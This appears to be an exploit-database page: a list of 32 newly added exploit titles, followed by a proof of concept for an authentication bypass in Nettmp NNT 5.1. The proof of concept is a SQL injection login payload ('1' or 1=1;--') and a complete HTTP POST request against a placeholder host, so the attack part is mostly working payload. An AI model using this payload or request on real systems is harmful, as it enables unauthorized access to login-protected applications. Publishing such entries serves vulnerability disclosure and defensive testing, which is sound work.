1472d8e723
32 changes to exploits/shellcodes Siemens S7 Layer 2 - Denial of Service (DoS) TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Automox Agent 32 - Local Privilege Escalation ConnectWise Control 19.2.24707 - Username Enumeration Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) AWebServer GhostBuilding 18 - Denial of Service (DoS) TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) Dixell XWEB 500 - Arbitrary File Write Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) CMSimple 5.4 - Cross Site Scripting (XSS) RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) Nettmp NNT 5.1 - SQLi Authentication Bypass Hostel Management System 2.1 - Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) Hospitals Patient Records Management System 1.0 - Account TakeOver Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) Vodafone H-500-s 3.5.10 - WiFi Password Disclosure openSIS Student Information System 8.0 - 'multiple' SQL Injection Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
31 lines
No EOL
918 B
Text
31 lines
No EOL
918 B
Text
# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
|
|
# Date: 23/12/2021
|
|
# Exploit Author: Momen Eldawakhly (Cyber Guy)
|
|
# Vendor Homepage: https://wiki.nettemp.tk
|
|
# Software Link: https://wiki.nettemp.tk
|
|
# Version: nettmp NNT
|
|
# Tested on: Linux (Ubuntu 20.04)
|
|
|
|
Payload:
|
|
|
|
username: 1' or 1=1;--
|
|
password: \
|
|
|
|
Proof of Concept:
|
|
|
|
POST /index.php?id=status HTTP/1.1
|
|
Host: vuln.com
|
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 55
|
|
Origin: http://vuln.com
|
|
DNT: 1
|
|
Connection: close
|
|
Referer: http://vulnIP/index.php?id=status
|
|
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
username=1%27+or+1%3D1%3B--&password=%5C&form_login=log |